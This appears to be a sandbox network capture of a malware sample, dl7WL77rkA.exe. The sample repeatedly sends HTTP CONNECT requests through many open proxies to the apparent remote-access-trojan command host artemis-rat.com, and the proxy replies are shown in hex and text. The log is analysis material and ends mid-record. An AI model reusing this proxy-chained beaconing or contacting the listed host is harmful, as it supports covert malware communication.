                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            976192.168.2.552587196.20.125.14980833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.601233959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            977192.168.2.552125107.180.88.41580373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.615704060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.701805115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            978192.168.2.55259191.189.177.19031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.619033098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.950541019 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/5.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3628
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from lb1
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from lb1:3128
                                                                                                                                                                                                                                                            Via: 1.1 lb1 (squid/5.7)
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            979192.168.2.552615207.180.234.220397373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.620213032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.389347076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.389731884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.202162027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.889749050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.702083111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            980192.168.2.55259965.109.152.8888883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.628547907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.952377081 CET236INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Length: 69
                                                                                                                                                                                                                                                            Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 32 37 2e 30 2e 30 2e 31 3a 35 33 3a 20 73 65 72 76 65 72 20 6d 69 73 62 65 68 61 76 69 6e 67 0a
                                                                                                                                                                                                                                                            Data Ascii: dial tcp: lookup artemis-rat.com on 127.0.0.1:53: server misbehaving


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            981192.168.2.552574103.231.45.14510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.628551006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            982192.168.2.550473162.223.116.75803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.636621952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.701844931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.702188969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.702240944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            983192.168.2.552579112.109.16.5180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.658297062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.894119024 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            984192.168.2.55265014.103.26.5380003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.658514023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.957457066 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Server: nginx/1.19.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 579
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.19.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            985192.168.2.55258138.156.75.1480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.659401894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.112646103 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            986192.168.2.55263945.71.184.13480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.668133974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.119857073 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            987192.168.2.55259843.133.136.20888003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.668317080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            988192.168.2.55265143.129.228.4678913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.668422937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            989192.168.2.55264751.89.173.40265453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.668545008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.389410973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.389781952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389647961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207736015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.999226093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.701992989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.201786041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            990192.168.2.5526211.194.236.22950053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.668704987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
